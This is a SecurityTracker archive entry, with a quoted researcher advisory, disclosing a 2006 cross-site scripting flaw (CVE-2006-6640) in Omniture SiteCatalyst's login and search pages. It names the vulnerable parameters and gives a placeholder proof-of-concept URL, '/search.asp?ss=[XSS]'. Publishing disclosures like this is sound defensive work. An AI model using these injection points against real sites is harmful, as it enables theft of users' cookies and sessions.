SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   Adobe Analytics (Omniture SiteCatalyst) Vendors:   Omniture
Omniture SiteCatalyst Input Validation Hole in Login Page Permits Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1017392
SecurityTracker URL:  http://securitytracker.com/id/1017392
CVE Reference:   CVE-2006-6640   (Links to External Site)
Updated:  Jan 26 2007
Original Entry Date:  Dec 18 2006
Impact:   Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  

Description:   Doz from Hackers Center Security Group reported a vulnerability in Omniture SiteCatalyst. A remote user can conduct cross-site scripting attacks.

The web login page does not properly filter HTML code from user-supplied input in the 'company' and 'username' parameters before displaying the input. A remote user can cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the SiteCatalyst software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

The search function is also affected.

Other related products may also be affected.

Impact:   A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the SiteCatalyst software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
Solution:   The vendor has reportedly issued a fix.
Vendor URL:  www.omniture.com/ (Links to External Site)
Cause:   Input validation error

Message History:   None.


 Source Message Contents

Subject:  SiteCatalyst Web Login Cross Site Vulnerabilities

Hackers Center Security Group (http://www.hackerscenter.com/)
Doz's Security Advisory


Desc: SiteCatalyst Web Login Cross Site Vulnerabilities
Risk: Medium





Omniture, Inc aims its aperture at your Web site. The company provides Internet 
analytic software and services to corporate customers such as AOL, eBay, General 
Motors, and Microsoft. Omniture's primary product, SiteCatalyst, helps clients 
electronically measure Web site traffic, visitor activity, advertising effectiveness, 
and e-commerce transactions. Other products include the Omniture Discover, Data, and 
SearchCenter line of products, designed to provide customers access to all of their 
data in real time.

Login & Search Engines scripts affected

Vendor: www.omniture.com

Company Email: ir@omniture.com


Proof of concept:


/search.asp?ss=[XSS]


Many sites running Omniture Web tools are almost certainly vulnerable to cross site 
scripting holes. We made a research and many big companies are using Omniture products 
(Microsoft included).


-- HSC Security Group
http://www.hackerscenter.com

Security researcher? Join us: mail Zinho at zinho at hackerscenter.com

__________________________________________________
Do You Yahoo!?
Tired of spam? Yahoo! Mail has the best spam protection around
http://mail.yahoo.com 
 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC